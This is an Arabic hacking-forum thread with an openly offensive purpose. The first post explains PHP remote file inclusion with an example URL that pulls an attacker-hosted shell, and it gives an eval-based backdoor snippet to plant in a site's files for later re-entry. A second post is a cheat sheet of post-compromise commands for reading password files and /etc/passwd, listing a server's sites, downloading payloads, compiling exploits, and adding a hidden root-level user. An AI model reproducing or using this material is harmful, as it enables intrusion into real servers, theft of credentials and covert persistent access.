![]() |
![]() |
![]() |
التسجيل في المنتدى غير متاح حاليا, اذا كنت ترغب في الحصول على عضوية ارجو مراسلتي على البريد الالكتروني "[email protected]"
مطلوب مشرفين على كامل اقسام المنتدى
|
|
![]() |
|
|
|
![]() |
|
| [ مـنتدى حمايه المواقع والسيرفرات | Hacking Site's & Servers ] حمايه وأختراق المواقع والسيرفرات باحدت الطرق والادوات .. |
![]() |
|
|
أدوات الموضوع | انواع عرض الموضوع |
|
|
المشاركة رقم: 1 | ||||||||||||||||||||||||||||||||||||||||||||||||||||
شكراً: 128
تم شكره 120 مرة في 72 مشاركة
|
السلام عليكم ورحمه الله وبركاته
ثغره قديمه (لايعني انها انتهت بالكامل رغم انها اكثر ثغره قد لا تجدها )من ايام 2003 انتشرت وكان الهكر يتسابقو في رفع الشلات عكس اليوم نتسابق برفع الاندكسات الثغره ايام زمان كان لا يخلو موقع الا مصاب فيها وكان الحل الوحيد لها هو ترقيه اصدار php الى اصدار php 5 الجانب الثاني من الثغره هو انها رائعه بزرع كود يمكننا تسميته خبيث يحيث نزرع الثغره نفسها بالملفات الخاصه بالموقع وهذا يساعدنا على بقاء خط رجعه للسيرفر بالوقت الذي نريد ![]() واحيانا يلزم بشكل كبير عندما تتمكن من تخطي حمايه موقع ما ورفع شل لكن الحجم غير مناسب بحيث يجبرك الموقع على رفع شل بحم مثلا 60 كيلو بايت وهذا قليل جدا ويصعب ايجاد شل بهذه المواصفات اما الشيء الثاني عندما ترفع شل من ثغره ما اخرى لا يظهر لديك الشل والسبب حمايه السيرفر تمع بعض اكواد الشل بالتالي يظهر لديك خطا evil() وهذا يسبب لك الازعاج فيمكنك رفع شل الثغره لكي تطلع ع حمايه السيرفر وتفتكر طريق مناسبه للتخطي وهون بدك تغير الشل الي معاك لشل اخر الجانب الاخير ان بالرغم من ان الكود معقد للاصدار php5 ,من شبه المستحيل ان تلقى مبرمج فعلها الا ان الجانب الخير موجود بالمبرمجين فهناك من يستخدم هذا الكود وبالتالي يقع بالثغره لكن نادرا الان خلصنا مقدمه عن الثغره (كتاب تاريخ وجغرافيا ) نبدا بالاستغلال في حال الphP4 نبد ب ـ كود PHP: كود PHP:
كود PHP:
نشرح هي الداله الي عملت لنا ثغره الانكلود وهناك مزيد من الدوال ( Include و Include_once و Require و Require_once ) هنا هذا المتغير المصاب بالثغره وهو الذي منه ندرج الانكلود او ملف ما من خارج السيرفر وهكذا [PHP] php4 php5 include base_path xxxxxxxxxxx.com/xxx.php?base_path=http://mysit.com/shell.txt? [/PHP ] هنا كود الانكلود لاصدار php5 <?php if($_GET***91;dz4all***93 { $file=implode("\n",file($_GET***91;$dz4all***93 ); $dz4all=str_replace("<?php", "",$file); $dz4all=str_replace("<?", "",$dz4all); $dz4all=str_replace("?>", "",$); eval($dz4all); } لمزيد من التساولات يرجي ادراجها تحياتي [] الشرح التالي يكون على []
|
||||||||||||||||||||||||||||||||||||||||||||||||||||
|
|
||||||||||||||||||||||||||||||||||||||||||||||||||||
| 2 أعضاء قالوا شكراً لـ S4wDz على المشاركة المفيدة: |
co10ol (22/07/2011),
ViRuS_Ra3cH (24/09/2011)
|
|
|
المشاركة رقم: 2 | ||||||||||||
|
أوامر الضغط وفك الضغط مثال على الأمر للتوضيح الأمر كتابتاً وظيفة الأمر qzip failname qzip zip أمر الضغط بامتداد unzip failname unzip zip امر فك الضغط بامتداد tar -zcf zz.tar daily tar -zcf tar أمر الضغط بامتداد tar -zxf zz.tar tar -zxf tar أمر فك الضغط بامتداد tar -czvffilename.tar.gz filename.sql tar -czvf gz أمر ضغط الملف بامتدا gzip -d file.gz gzip -d gz فك الضغط بامتداد tar -czvf filename.tar.gzfile name.sql tar -czvf كيفية ضغط قاعدة البيانات tar -zxvf file name.tar.gz tar -zxvf كيفية فك قواعد البيانات tar -czvf /home/user/public_html/n3.tar.gzn3 tar -czvf tar.gz امر ضغط المجلدات بامتداد
أوامر الداخلية مثال على الأمر للتوضيح الأمر كتابتاً وظيفة الأمر ls ls استعراض الملفات ls ls -la استعراض الملفات والمجلدات المخفية والتصاريح pwd pwd تحديد المكان علىالسيرفر ls;pwd ; اداة الربط بين الأوامر wget http://xxxx.com/xxx.zip wget أمرالسحب curl -o ./xxx.zip http://xxxx.com/xxx.zip curl -o ./ امر السحب الآخر history history أمر معرفة جميع الأوامر التي نفذت بالشل mkdir shuooon mkdir انشاء مجلد جديد rm failname rm أمر الحذف rm -r dir rm -r حذف مجلد بجميع الملفات editfailname edit أمر التعديل who who امر التصلين على السيرفر cd cd امر دخول المجلدات cd .. cd .. امر العودة للخلف mv mv امر اعادة التسمية find find امر البحث ./ ./ أمر تشغيل الباك دور uname -a uname -a أمر معرفة اصدار السيرفر ls ftp.zip* * امر يرمز للكل man ls man امر المساعدة drwxrwxrwx chmod 777 dd chmod أمر إعطاء التصريح touch shuooon.php touch أمر انشاء ملف فارغ gcc xxx.c -o xxx gcc ترجمة الكومبايل او الاكسبلويت usr/bin/perl يبدأ الكود بهذه الكلة لا يحتاج ترجمة ملفات البيرل تبدأ بــ include يبدأ الكود بهذه الكلة ترجمة وتشغيل فقط ملفات السي تبدأ بــ أوامر الخارجية مثال على الأمر للتوضيح الأمر كتابتاً وظيفة الأمر cat /home/*/public_html/_vti_pvt/access.cnf cat عرض جميع المواقع التي على السيرفر cat /home/*/public_html/_vti_pvt/service.pwd cat عرض جميع الباسووردات على السيرفر cat /usr/local/apache/conf/httpd.conf cat لمعرفة عرض مصدر السيرفر find / -name httpd.conf find عرض المصدر more /etc/userdomains more CAT امر مشابة للأمر pico /home/burst/public_html/index.html pico تحرير النصوص vi /home/burst/public_html/index.html vi امر تحرير به الكثير من المزايا لكنه اصعب من السابق valiases المهم نحدد ls -la /etc/valiases ls معرفة المواقع اللي على السيرفر مع اليوزر ls /var/named ls معرفة جميع المواقع اللي على السيرفر valiases المهم نحدد ls /usr/local/psa/home/vhosts/ ls معرفة جميع المواقع على السيرفر perl xxxx.pl perl تشغيل البيرل cat /etc/passwd ابحث عن bash cat امر استخراج حسابات الشل height="250" scrolling="no"> اكتب الامر التالي لاضافه يوزر بصلاحيات الروت ومضاف الى مجموعه الروت : /usr/sbin/useradd -o -u 0 -g 0 dz4all -p adminR00t تفاصيل الامر طبعا اليوزراللي هو روت:dz4all والباسورد : adminR00t -o : لاستخدام تغيرات مع الامر -u : لاضافته الى مجموعه اليوزر ذات رقم 0 ( الي هي الروت ) -g : group او المجموعه ذات رقم 0 يعني مجموعه الروت ايضا . ---------------- ونجي بامر ثاني نفس الامر الاول . ايضا تقدر عن طريق هذا الامر: /usr/sbin/useradd -o -u 0 dz4all ومن بعدها تدخل لهذا المستخدم باسورد يعني تضيف باسوورد جديد للمستخدم واذا تبي تغير باسوورد يوزر كذا بعد بالطريقه التاليه: بعدين بيطلع لك الرساله التاليه: تكتب باسوورد جديد ولازم يكوون صعب ومعقد (: بعدين تطلع لك رساله زي كذا يعني ادخلها مره ثانيه: يعني اعد ادخال كلمه المرور اعد كتابتها ,, بيعطيك الرساله التاليه : passwd: all authentication tokens updated successfully. passwd dz4all New UNIX password: Retype new UNIX password: Changing password for user dz4all.ومبرووك عليك صلاحيات مستخدم روت جديده (: سوف يتم ادراج دورة خاصة مشروحة بالفيديو عن قريب مهداة الى كل الاعضاء dz4all مازال نكملو في هذا الميضوع |
||||||||||||
|
|
||||||||||||
|
|
المشاركة رقم: 3 | ||||||||||||
|
باترك الله فيك |
||||||||||||
|
|
||||||||||||
|
|
المشاركة رقم: 4 | ||||||||||||
|
جزاك الله خيرا يا اخي |
||||||||||||
|
|
||||||||||||
![]() |
| مواقع النشر (المفضلة) |
| حالياً الأعضاء النشيطين الذين يشاهدون هذا الموضوع : 1 (0 عضو و 1 ضيف) | |
(أظهر الكل)
الأعضاء الذين قاموا بمشاهدة هذا الموضوع : 42
|
|
| .ılı.мя●Gh●ŠŦ.ılı. , 12321 , 9lbi hacker , anass-rac , محتـويني , BaKaRoW , BUZNESS MAN , co10ol , DR.X , ExPLo!T_Dz , برمجي و هكرز , HACER DZ , hack4live , hakorosgayor , hardTARGET1234 , Hit-Man , ilyas0206=DZ , joker-dz , lennix , lesta , massacreur , moja4ed_fz , mosta_spu , Mr norvi , MR.KaDeRoU , Mr.piRaTe , OXO , pain96 , probably , R3D 3RR0R , rafa , rullof , S4wDz , salem k , Th3 WiTch3r-Dz , tira30 , veros_dz , vih-10 , ViRuS_Ra3cH , z4k!_xy , zakistarman , zerocold |
|
|
المواضيع المتشابهه
|
||||
| الموضوع | كاتب الموضوع | المنتدى | مشاركات | آخر مشاركة |
| شرح ثغره من ثغرات Wordpress | Mr norvi | [ مـنتدى حمايه المواقع والسيرفرات | Hacking Site's & Servers ] | 5 | 16/12/2010 12:22 |
| Duhok Forum Remot upload Vulnerability | BrOx-Dz | [ الـهاكر الـعام | General Hacking Discussions ] | 3 | 30/11/2010 21:06 |
| ثغره 0Day تمكنك من تلغيم صوتيات RealPlayer | ExPLo!T_Dz | [ مـنتدى حمايه الاجهزة | Hacking Pc ] | 4 | 26/09/2010 15:19 |
| حوار حول استغلال ثغرات المنتديات واستغلالها | DR.X | [ مـنتدى حمايه المواقع والسيرفرات | Hacking Site's & Servers ] | 3 | 18/08/2010 08:08 |
![]() |
![]() |
![]() |